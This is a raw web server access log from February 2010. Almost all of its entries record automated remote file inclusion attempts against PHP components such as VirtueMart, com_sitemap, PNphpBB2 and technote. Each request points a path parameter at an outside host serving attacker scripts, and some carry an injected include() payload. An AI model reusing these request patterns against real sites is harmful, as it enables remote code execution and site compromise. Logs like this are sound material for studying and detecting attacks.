83.103.72.130 - - [11/Feb/2010:06:49:20 -0800] "GET /logs/access_100126.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [11/Feb/2010:06:49:25 -0800] "GET /logs/access_100119.log%20%20////skin/zero_vote/ask_password.php?dir=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:49:27 -0800] "GET /logs/access_100128.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [11/Feb/2010:06:49:31 -0800] "GET /logs/access.log///bbs/delete_all.php?board_skin_path=http://www.clubedasmotocas.com.br/loja/suporte/data/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.216.131 - - [11/Feb/2010:06:49:50 -0800] "GET /logs/access_100110.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
124.217.216.131 - - [11/Feb/2010:06:49:51 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
124.217.216.131 - - [11/Feb/2010:06:49:52 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:50:23 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:50:25 -0800] "GET /logs/access_100126.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:50:41 -0800] "GET /logs/access_100128.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.228.45.47 - - [11/Feb/2010:06:52:47 -0800] "GET /logs/access_100114.log///?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.228.45.47 - - [11/Feb/2010:06:52:54 -0800] "GET /logs/access_100201.log///?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:53:09 -0800] "GET /logs/access_100208.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:53:10 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:53:10 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:53:28 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:53:29 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:53:29 -0800] "GET /logs/access_100126.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:53:40 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:53:40 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:53:40 -0800] "GET /logs/access_100208.log//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:53:43 -0800] "GET /logs/access_100208.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:53:43 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:53:43 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
124.217.216.131 - - [11/Feb/2010:06:54:06 -0800] "GET /logs/access_100111.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:54:23 -0800] "GET /logs/access_100201.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:54:24 -0800] "GET /logs/access_100208.log//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:54:24 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:54:25 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:56:16 -0800] "GET /logs/access_100111.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:06:56:20 -0800] "GET /logs/access_100117.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:06:56:20 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:06:56:21 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:06:56:32 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:06:56:36 -0800] "GET /logs/access_100117.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:06:56:36 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:56:40 -0800] "GET /logs/access_100111.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:58:21 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:06:58:31 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:06:58:31 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:06:58:32 -0800] "GET /logs/access_100117.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:58:32 -0800] "GET /logs/access_100126.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:06:59:28 -0800] "GET /logs/access_100107.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:59:32 -0800] "GET /logs/access_100201.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:06:59:43 -0800] "GET /logs/access_100128.log%20%20//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:06:59:43 -0800] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:06:59:44 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:07:00:00 -0800] "GET /logs/access_100128.log%20%20//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:07:00:00 -0800] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:07:00:01 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:07:00:07 -0800] "GET /logs/access_100107.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:00:51 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:01:04 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:01:04 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:01:05 -0800] "GET /logs/access_100118.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:07:01:20 -0800] "GET /logs/access_100107.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:01:51 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:07:02:08 -0800] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:07:02:08 -0800] "GET /logs/access_100119.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:07:02:08 -0800] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [11/Feb/2010:07:02:22 -0800] "GET /logs/access.log/administrator/components/com_clickheat/Recly_Config.php=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:02:25 -0800] "GET /logs/access_100125.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [11/Feb/2010:07:02:37 -0800] "GET /logs/access_100112.log/administrator/components/com_clickheat/Recly_Config.php=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:07:02:38 -0800] "GET /logs/access_100126.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:02:50 -0800] "GET /logs/access_100125.log//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:03:38 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:03:39 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:03:39 -0800] "GET /logs/access_100118.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:07:04:19 -0800] "GET /logs/appserv/mani.php?appserv_root=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:07:04:19 -0800] "GET /logs/access_100111.log/appserv/mani.php?appserv_root=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:07:04:19 -0800] "GET /appserv/mani.php?appserv_root=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:04:37 -0800] "GET /logs/access_100125.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:07:04:42 -0800] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:07:04:42 -0800] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:07:04:42 -0800] "GET /logs/access_100119.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:05:12 -0800] "GET /logs/access_100126.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [11/Feb/2010:07:05:16 -0800] "GET /logs////administrator/components/com_memberlist/current_connect.php?mosConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [11/Feb/2010:07:05:16 -0800] "GET ///administrator/components/com_memberlist/current_connect.php?mosConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [11/Feb/2010:07:05:17 -0800] "GET /logs/access_100121.log%20%20////administrator/components/com_memberlist/current_connect.php?mosConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [11/Feb/2010:07:05:20 -0800] "GET /logs////administrator/components/com_memberlist/current_connect.php?mosConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [11/Feb/2010:07:05:20 -0800] "GET ///administrator/components/com_memberlist/current_connect.php?mosConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [11/Feb/2010:07:05:20 -0800] "GET /logs/access_100121.log%20%20////administrator/components/com_memberlist/current_connect.php?mosConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:05:25 -0800] "GET /logs/access_100201.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:07:05:49 -0800] "GET /appserv/mani.php?appserv_root=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:07:05:49 -0800] "GET /logs/access_100111.log/appserv/mani.php?appserv_root=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:07:05:49 -0800] "GET /logs/appserv/mani.php?appserv_root=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:07:05:57 -0800] "GET /logs/access_100126.log/appserv/mani.php?appserv_root=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:07:07:18 -0800] "GET /logs/access_100126.log/appserv/mani.php?appserv_root=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:07:08:04 -0800] "GET /logs/access_100120.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:07:08:05 -0800] "GET /logs/access_100128.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:07:08:09 -0800] "GET /logs/access_100128.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:07:08:35 -0800] "GET /logs/access_100128.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:08:58 -0800] "GET /logs/access_100103.log//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:08:58 -0800] "GET /logs//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:08:58 -0800] "GET /errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.181.217 - - [11/Feb/2010:07:09:11 -0800] "GET /logs/access_100208.log//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.181.217 - - [11/Feb/2010:07:09:12 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
61.100.181.217 - - [11/Feb/2010:07:09:12 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
61.100.181.217 - - [11/Feb/2010:07:10:40 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
61.100.181.217 - - [11/Feb/2010:07:10:41 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:11:05 -0800] "GET /logs/access_100126.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:07:11:08 -0800] "GET /logs/access_100120.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:11:12 -0800] "GET /logs/access_100201.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [11/Feb/2010:07:11:31 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [11/Feb/2010:07:11:32 -0800] "GET /orange_g/forum/viewtopic.php?p=25269 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
